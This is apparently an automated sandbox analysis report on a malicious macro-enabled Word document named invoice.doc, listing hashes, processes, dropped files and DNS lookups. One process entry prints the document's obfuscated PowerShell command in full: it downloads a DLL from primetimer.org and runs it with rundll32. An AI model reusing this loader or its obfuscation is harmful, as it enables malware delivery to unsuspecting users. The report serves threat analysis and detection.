File name: invoice.doc

Full analysis: https://app.any.run/tasks/d6f50297-2505-4c78-bc90-31d6c4e2656f
Verdict: Malicious activity
Analysis date: November 08, 2018, 15:17:55
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags: macros, macros-on-open
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1251, Author: James Smith, Template: Normal.dotm, Last Saved By: Windows User, Revision Number: 3, Name of Creating Application: Microsoft Office Word, Total Editing Time: 01:00, Create Time/Date: Sun Nov 4 19:24:00 2018, Last Saved Time/Date: Wed Nov 7 02:32:00 2018, Number of Pages: 1, Number of Words: 0, Number of Characters: 1, Security: 0
MD5: 1374457044433A7AD196C1E43ACB15C1
SHA1: 98DC8E8DE4C6EC1E0F39331C68B2E89C8E86F6EE
SHA256: B84E2524F59F318D5F8BD01B4CCC38FBD691F382873892D5304D760FAF0064C7
SSDEEP: 6144:vTGfXFMFu9mycXxnBWbtzcn3lgO4VoX9B38Js+:b41SyqxnBWb5cVgZaXv8

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Executable content was dropped or overwritten

      • WINWORD.EXE (PID: 968)
      • WINWORD.EXE (PID: 3048)
      • WINWORD.EXE (PID: 700)
    • Application was dropped or rewritten from another process

      • chaua.exe (PID: 456)
    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 968)
    • Loads dropped or rewritten executable

      • explorer.exe (PID: 1604)
  • SUSPICIOUS

    • Reads Internet Cache Settings

      • explorer.exe (PID: 1604)
    • Creates files in the user directory

      • explorer.exe (PID: 1604)
      • chaua.exe (PID: 456)
    • Uses RUNDLL32.EXE to load library

      • chaua.exe (PID: 456)
  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 968)
      • WINWORD.EXE (PID: 3048)
      • WINWORD.EXE (PID: 700)
    • Dropped object may contain Bitcoin addresses

      • WINWORD.EXE (PID: 968)
      • WINWORD.EXE (PID: 3048)
      • WINWORD.EXE (PID: 700)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 968)
      • WINWORD.EXE (PID: 3048)
      • WINWORD.EXE (PID: 700)
    • Starts Microsoft Office Application

      • explorer.exe (PID: 1604)
No Malware configuration.

TRiD

.doc | Microsoft Word document (80)

EXIF

FlashPix

CompObjUserType: ???????? Microsoft Office Word 97-2003
CompObjUserTypeLen: 39
HeadingPairs:
  • Название
  • 1
TitleOfParts: -
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 12
CharCountWithSpaces: 1
Paragraphs: 1
Lines: 1
Company: -
CodePage: Windows Cyrillic
Security: None
Characters: 1
Words: -
Pages: 1
ModifyDate: 2018:11:07 02:32:00
CreateDate: 2018:11:04 19:24:00
TotalEditTime: 1.0 minutes
Software: Microsoft Office Word
RevisionNumber: 3
LastModifiedBy: Windows User
Template: Normal.dotm
Keywords: -
Author: James Smith
Subject: -
Title: -
No data.
Total processes: 56
Monitored processes: 10
Malicious processes: 4
Suspicious processes: 1

Behavior graph

[Behavior graph. Nodes, in order: winword.exe, chaua.exe, rundll32.exe, winword.exe, explorer.exe, explorer.exe, notepad.exe, notepad.exe, winword.exe, explorer.exe. Edge labels: "drop and start", "start".]

Process information

PID: 968
CMD: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\invoice.doc"
Path: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Parent process: explorer.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Microsoft Word
Exit code: 0
Version: 14.0.6024.1000

PID: 456
CMD: "C:\Users\admin\AppData\Local\Temp\qgnrahnui3\chaua.exe" $egabmypniujouovq6='ui3''';$tgvlrpmueqmvflyoaiwf='path=($en';$yeaeeaujsosbuua1=';Se';$eqkzlkejvawpqpqifkaydwuyeda='org/Xk';$ndojlceoiuoierjerlaqgmby='t System';$cahaaiilusephaohps05='php'',$';$ouboyaeuycah='t-Execu';$gyvouelayafgarddzy1='ss; $';$aobdseetzparmarmuuwf='''\z';$baaxslplaidrvehoqaymk60='cy By';$bvfrepnjwjpusrjjrwiaoffsu='hwh';$euukejdtncnqojxaoi='.dll'');';$ooqqbuoifbiiy='dFile(';$qwlofnexwuaouioaufbw='data+';$btouqdroaktfhyqgpuyyy='.Web';$fbrnyieyuiauiz='pass -Sc';$icfraektfrylkacqgwzrgfmvmzn82='rahn';$pjblncsnvyllrba25='qQkPWluO.';$wyssfngydmdwbpbsmk='prime';$uvfhheooqeaztoeg='l32 $p';$emnhxakhvharrqeobntmjkoyijq='path);';$yyvjvzbdtjnzclrpwsbswryupx='tionPoli';$yeozwuhayiomqagwja0='Downloa';$qrrflzpgijzpwkbnfktoke='(New-Ob';$znrxaxsebqjulaixhoukvxu7='Item ';$yrmeeeisxltkamiaaltb='''http://';$ioynehfvdkjqjeocmbovrs='se -for';$vtuiqqbukzaurcups1='vyeo';$urllsrgiczilzrboaetgsxhknlp='client).';$kbyowbudphqaoulhuesjjtyls='.Net';$vgnynvatppveuey60='fhj''';$alcpfemwsvbctgtlmlajfuiuyeq='ath , ''';$yjuuicgzcweoiut='f1'';Rem';$yyvcnzapjqjfxndzlldwattao='p + ''\qgn';$akouyyojompjrab='($env:tem';$mrdpdblcakqfyuydixminu05='$hj = ''';$zoflvqquooeyzilbiiqpouzlo=') -recur';$uerehhhpiebylwuauia='ove-';$micvzqjnkskthioyoskdqo='timer.';$rbkdlyuoterlqhiutjloe='v:app';$otruaanwcoaxmsxp=' rundl';$pxilntduusvjguyabvodpy='ope Proce';$aeaktrrowacvjlzyabew='ce;';$iaolcifsdafiuoesiyj='jec'; Invoke-Expression ($mrdpdblcakqfyuydixminu05+$bvfrepnjwjpusrjjrwiaoffsu+$vgnynvatppveuey60+$yeaeeaujsosbuua1+$ouboyaeuycah+$yyvjvzbdtjnzclrpwsbswryupx+$baaxslplaidrvehoqaymk60+$fbrnyieyuiauiz+$pxilntduusvjguyabvodpy+$gyvouelayafgarddzy1+$tgvlrpmueqmvflyoaiwf+$rbkdlyuoterlqhiutjloe+$qwlofnexwuaouioaufbw+$aobdseetzparmarmuuwf+$vtuiqqbukzaurcups1+$euukejdtncnqojxaoi+$qrrflzpgijzpwkbnfktoke+$iaolcifsdafiuoesiyj+$ndojlceoiuoierjerlaqgmby+$kbyowbudphqaoulhuesjjtyls+$btouqdroaktfhyqgpuyyy+$urllsrgiczilzrboaetgsxhknlp+$yeozwuhayiomqagwja0+$ooqqbuoifbiiy+$yrmeeeisxltkamiaaltb+$wyssfngydmdwbpbsmk+$micvzqjnkskthioyoskdqo+$eqkzlkejvawpqpqifkaydwuyeda+$pjblncsnvyllrba25+$cahaaiilusephaohps05+$emnhxakhvharrqeobntmjkoyijq+$otruaanwcoaxmsxp+$uvfhheooqeaztoeg+$alcpfemwsvbctgtlmlajfuiuyeq+$yjuuicgzcweoiut+$uerehhhpiebylwuauia+$znrxaxsebqjulaixhoukvxu7+$akouyyojompjrab+$yyvcnzapjqjfxndzlldwattao+$icfraektfrylkacqgwzrgfmvmzn82+$egabmypniujouovq6+$zoflvqquooeyzilbiiqpouzlo+$ioynehfvdkjqjeocmbovrs+$aeaktrrowacvjlzyabew);
Path: C:\Users\admin\AppData\Local\Temp\qgnrahnui3\chaua.exe
Parent process: WINWORD.EXE
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows PowerShell
Exit code: 0
Version: 6.1.7600.16385 (win7_rtm.090713-1255)

PID: 2424
CMD: "C:\Windows\system32\rundll32.exe" C:\Users\admin\AppData\Roaming\zvyeo.dll f1
Path: C:\Windows\system32\rundll32.exe
Parent process: chaua.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows host process (Rundll32)
Exit code: 0
Version: 6.1.7600.16385 (win7_rtm.090713-1255)

PID: 3048
CMD: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\invoice.doc"
Path: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Parent process: explorer.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Microsoft Word
Exit code: 0
Version: 14.0.6024.1000

PID: 3808
CMD: "C:\Windows\explorer.exe"
Path: C:\Windows\explorer.exe
Parent process: explorer.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Explorer
Exit code: 1
Version: 6.1.7600.16385 (win7_rtm.090713-1255)

PID: 1604
CMD: C:\Windows\Explorer.EXE
Path: C:\Windows\explorer.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Explorer
Version: 6.1.7600.16385 (win7_rtm.090713-1255)

PID: 328
CMD: "C:\Windows\system32\NOTEPAD.EXE" C:\Users\admin\AppData\Local\Temp\qgnrahnui3\WSMan.Format.ps1xml
Path: C:\Windows\system32\NOTEPAD.EXE
Parent process: explorer.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Notepad
Exit code: 0
Version: 6.1.7600.16385 (win7_rtm.090713-1255)

PID: 2644
CMD: "C:\Windows\system32\NOTEPAD.EXE" C:\Users\admin\AppData\Local\Temp\qgnrahnui3\Certificate.format.ps1xml
Path: C:\Windows\system32\NOTEPAD.EXE
Parent process: explorer.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Notepad
Exit code: 0
Version: 6.1.7600.16385 (win7_rtm.090713-1255)

PID: 700
CMD: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\invoice.doc"
Path: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Parent process: explorer.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Microsoft Word
Version: 14.0.6024.1000

PID: 3416
CMD: "C:\Windows\explorer.exe"
Path: C:\Windows\explorer.exe
Parent process: explorer.exe
User: admin
Company: Microsoft Corporation
Integrity Level: MEDIUM
Description: Windows Explorer
Exit code: 1
Version: 6.1.7600.16385 (win7_rtm.090713-1255)
Total events: 8 693
Read events: 6 921
Write events: 0
Delete events: 0

Modification events

No data
Executable files: 41
Suspicious files: 0
Text files: 367
Unknown types: 15

Dropped files

PID
Process
Filename
Type

PID: 968
Process: WINWORD.EXE
Filename: C:\Users\admin\AppData\Local\Temp\CVRA285.tmp.cvr
MD5:
SHA256:

PID: 1604
Process: explorer.exe
Filename: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\invoice.doc.lnk
Type: lnk
MD5:2690A5681567DDF993C464B15B242847
SHA256:4B56B17C8BE26FB9D7997CD5AA55F10814890EF4B3CFF8A6D5B84199812FB875

PID: 968
Process: WINWORD.EXE
Filename: C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\invoice.doc.LNK
Type: lnk
MD5:670E13493ECC1107BEDE395807B735EC
SHA256:8DC0C30BDAD2E63C836EBD9C88E6F5292AAAE04C8D9D4D26DE4D9172C4FAE9D8

PID: 968
Process: WINWORD.EXE
Filename: C:\Users\admin\AppData\Local\Temp\qgnrahnui3\CompiledComposition.Microsoft.PowerShell.GPowerShell.dll
Type: executable
MD5:A84B6952AB6A297CCE6C085FA8AB06CB
SHA256:54E3F8199D5C749920A2826C63D7C5E7E86D94874ADDCFD5C9B430671031017D

PID: 968
Process: WINWORD.EXE
Filename: C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat
Type: text
MD5:500A1C0AB1A05201CE7A192CDAABCA55
SHA256:E7DE924E3C3BFFF39C6664F77C25DE7E4F48206DCE9919BDB34F449698DD640B

PID: 1604
Process: explorer.exe
Filename: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\a7bd71699cd38d1c.automaticDestinations-ms
Type: automaticdestinations-ms
MD5:39B942AAF6246EE3F59E89E4623FD344
SHA256:AFC0B10BC338D9EF71151B91DDB11F8E6012D52B617423E9C9D7E009D35521B4

PID: 968
Process: WINWORD.EXE
Filename: C:\Users\admin\AppData\Local\Temp\qgnrahnui3\Diagnostics.Format.ps1xml
Type: text
MD5:FF6EEB8125B9265C5BA40AF9F7C6F6BC
SHA256:7D569C1155CFA9B7BB2BA225EE409A55C8B0E8217F3A7E05BAA39DA1BD7C4689

PID: 968
Process: WINWORD.EXE
Filename: C:\Users\admin\AppData\Local\Temp\qgnrahnui3\Certificate.format.ps1xml
Type: xml
MD5:C93A361112351B30E2C959E72789952D
SHA256:4379BD59C1328A6811584D424DF3DC193A5D607E2859D3AC1655B9124A5F100D

PID: 1604
Process: explorer.exe
Filename: C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\1b4dd67f29cb1962.automaticDestinations-ms
Type: automaticdestinations-ms
MD5:1F20E3676DBF3F0C1B16F8D2BE33E0A4
SHA256:3FA5AB55980D83E2B4879B0F1C8AECEC124F7E76490D0AFFFEF99373C25C2C49

PID: 968
Process: WINWORD.EXE
Filename: C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
Type: pgc
MD5:59131AE46194C72AAA2801E1AD2642A0
SHA256:32C5BFAA5D065DD7FD36D9AD6A40361A8160F42BB4F98F164D4D8BCB0E92CEE3
HTTP(S) requests: 0
TCP/UDP connections: 0
DNS requests: 3
Threats: 0

HTTP requests

No HTTP requests

Connections

No data

DNS requests

Domain: primetimer.org
Reputation: malicious

Domain: dns.msftncsi.com
IP: 131.107.255.255
Reputation: shared

Threats

No threats detected
No debug info